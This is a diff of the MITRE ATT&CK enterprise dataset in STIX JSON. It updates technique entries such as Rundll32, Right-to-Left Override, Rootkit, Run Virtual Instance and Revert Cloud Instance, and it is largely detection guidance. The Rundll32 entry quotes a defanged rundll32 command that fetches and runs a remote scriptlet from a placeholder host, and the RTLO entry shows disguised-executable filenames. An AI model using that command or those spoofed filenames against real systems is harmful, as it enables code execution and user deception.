+ "url": "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html",
+ "description": "Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Amazon Describe Instances CLI",
+ "url": "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html",
+ "description": "Amazon. (n.d.). describe-instances. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Google Compute Instances",
+ "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/list",
+ "description": "Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Azure VM List",
+ "url": "https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest",
+ "description": "Microsoft. (n.d.). az vm. Retrieved May 26, 2020."
}
],
"object_marking_refs": [
@@ -21899,16 +22638,18 @@
"phase_name": "discovery"
}
],
- "modified": "2020-03-26T18:13:00.634Z",
+ "modified": "2020-05-26T15:02:19.656Z",
"created": "2017-05-31T21:30:28.187Z",
- "x_mitre_version": "2.1",
- "x_mitre_data_sources": [
- "Network protocol analysis",
- "Process monitoring",
- "Process use of network",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian",
+ "RedHuntLabs, @redhuntlabs"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). ",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -21917,16 +22658,17 @@
"Azure",
"AWS"
],
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, the usage of particular commands or APIs to request information about remote systems may be common. Where possible, anomalous usage of these commands and APIs or the usage of these commands and APIs in conjunction with additional unexpected commands may be a sign of malicious use. Logging methods provided by cloud providers that capture history of CLI commands executed or API usage may be utilized for detection.",
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "Stackdriver logs",
+ "AWS CloudTrail logs",
+ "Network protocol analysis",
+ "Process monitoring",
+ "Process use of network",
+ "Process command-line parameters"
],
- "x_mitre_contributors": [
- "Praetorian",
- "RedHuntLabs, @redhuntlabs"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -21972,26 +22714,25 @@
],
"modified": "2020-02-10T20:03:11.691Z",
"created": "2020-02-10T20:03:11.691Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters",
"Binary file metadata"
],
- "x_mitre_detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "id": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Replication Through Removable Media",
- "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -21999,9 +22740,10 @@
"external_id": "T1091"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.",
+ "name": "Replication Through Removable Media",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -22013,8 +22755,9 @@
"phase_name": "initial-access"
}
],
- "modified": "2019-07-18T17:52:28.429Z",
+ "modified": "2020-07-14T19:45:59.638Z",
"created": "2017-05-31T21:31:08.977Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_version": "1.0",
"x_mitre_data_sources": [
"File monitoring",
@@ -22063,9 +22806,25 @@
"phase_name": "impact"
}
],
- "modified": "2019-10-10T18:40:46.985Z",
+ "modified": "2020-07-14T19:29:17.574Z",
"created": "2019-04-17T14:50:05.682Z",
- "x_mitre_detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows",
+ "AWS",
+ "GCP",
+ "Azure"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Azure activity logs",
"Stackdriver logs",
@@ -22075,31 +22834,11 @@
"Network protocol analysis",
"Network device logs"
],
- "x_mitre_version": "1.1",
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows",
- "AWS",
- "GCP",
- "Azure"
- ]
+ "x_mitre_detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage."
},
{
"id": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c",
- "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)",
"name": "Revert Cloud Instance",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"external_id": "T1536",
@@ -22117,6 +22856,36 @@
"description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019."
}
],
+ "revoked": true,
+ "type": "attack-pattern",
+ "modified": "2020-06-16T18:44:16.145Z",
+ "created": "2019-09-04T14:37:07.959Z"
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578.004",
+ "url": "https://attack.mitre.org/techniques/T1578/004"
+ },
+ {
+ "source_name": "Tech Republic - Restore AWS Snapshots",
+ "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/",
+ "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019."
+ },
+ {
+ "source_name": "Google - Restore Cloud Snapshot",
+ "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots",
+ "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Revert Cloud Instance",
+ "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)",
+ "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -22124,19 +22893,20 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T19:32:04.592Z",
- "created": "2019-09-04T14:37:07.959Z",
+ "modified": "2020-06-17T17:36:24.531Z",
+ "created": "2020-06-16T18:42:20.734Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
- "User",
- "Administrator"
+ "User"
],
"x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
"x_mitre_data_sources": [
- "AWS CloudTrail logs",
+ "Stackdriver logs",
+ "GCP audit logs",
"Azure activity logs",
- "Stackdriver logs"
+ "AWS CloudTrail logs"
],
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Netskope"
],
@@ -22144,10 +22914,25 @@
"AWS",
"GCP",
"Azure"
- ],
- "x_mitre_is_subtechnique": false
+ ]
},
{
+ "created": "2020-02-10T19:55:29.385Z",
+ "modified": "2020-03-29T20:16:36.316Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
+ "description": "Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.\n\nA common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
+ "name": "Right-to-Left Override",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -22170,22 +22955,6 @@
"description": "Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Right-to-Left Override",
- "description": "Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.\n\nA common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
- "id": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T20:16:36.316Z",
- "created": "2020-02-10T19:55:29.385Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -22247,9 +23016,16 @@
],
"modified": "2020-03-19T21:04:12.164Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Vincent Le Toux"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with \u201cGC/\u201d) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235\u20134B06\u201311D1-AB04\u201300C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.",
+ "x_mitre_defense_bypassed": [
+ "Log analysis"
],
"x_mitre_data_sources": [
"API monitoring",
@@ -22257,17 +23033,10 @@
"Network protocol analysis",
"Packet capture"
],
- "x_mitre_defense_bypassed": [
- "Log analysis"
+ "x_mitre_contributors": [
+ "Vincent Le Toux"
],
- "x_mitre_detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with \u201cGC/\u201d) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235\u20134B06\u201311D1-AB04\u201300C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
@@ -22316,35 +23085,93 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T23:30:21.364Z",
+ "modified": "2020-06-20T22:29:55.496Z",
"created": "2017-05-31T21:30:26.496Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "BIOS",
- "MBR",
- "System calls"
- ],
- "x_mitre_defense_bypassed": [
- "File monitoring",
- "Host intrusion prevention systems",
- "Process whitelisting",
- "Signature-based detection",
- "System access controls",
- "Whitelisting by file name or path",
- "Anti-virus"
- ],
- "x_mitre_detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "root"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root"
+ ],
+ "x_mitre_detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)",
+ "x_mitre_defense_bypassed": [
+ "File monitoring",
+ "Host intrusion prevention systems",
+ "Application control",
+ "Signature-based detection",
+ "System access controls",
+ "Application control by file name or path",
+ "Anti-virus"
+ ],
+ "x_mitre_data_sources": [
+ "BIOS",
+ "MBR",
+ "System calls"
+ ],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1564.006",
+ "url": "https://attack.mitre.org/techniques/T1564/006"
+ },
+ {
+ "source_name": "SingHealth Breach Jan 2019",
+ "url": "https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx",
+ "description": "Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited's Patient Database. Retrieved June 29, 2020."
+ },
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Run Virtual Instance",
+ "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)",
+ "id": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-07-06T19:03:40.330Z",
+ "created": "2020-06-29T15:36:41.535Z",
+ "x_mitre_detection": "Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a headless (in the background with no UI) virtual instance may be especially suspect. Network adapter information may also be helpful in detecting the use of virtual instances.\n\nIf virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \n\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.",
+ "x_mitre_contributors": [
+ "Janantha Marasinghe",
+ "Menachem Shafran, XM Cyber"
+ ],
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Host network interface",
+ "Windows Registry",
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5",
@@ -22373,7 +23200,7 @@
},
{
"id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
- "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)",
+ "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)",
"name": "Rundll32",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -22403,11 +23230,21 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T15:34:07.002Z",
+ "modified": "2020-06-20T22:31:42.113Z",
"created": "2020-01-23T18:03:46.248Z",
- "x_mitre_contributors": [
- "Casey Smith",
- "Ricardo Dias"
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"DLL monitoring",
@@ -22415,19 +23252,9 @@
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Application whitelisting",
- "Anti-virus"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Casey Smith",
+ "Ricardo Dias"
]
},
{
@@ -22456,6 +23283,22 @@
"created": "2019-04-09T16:09:22.173Z"
},
{
+ "created": "2020-03-02T14:30:05.252Z",
+ "modified": "2020-03-28T23:10:34.359Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "impact"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490",
+ "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+ "name": "Runtime Data Manipulation",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -22473,22 +23316,6 @@
"description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Runtime Data Manipulation",
- "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
- "id": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "impact"
- }
- ],
- "modified": "2020-03-28T23:10:34.359Z",
- "created": "2020-03-02T14:30:05.252Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -22614,24 +23441,24 @@
],
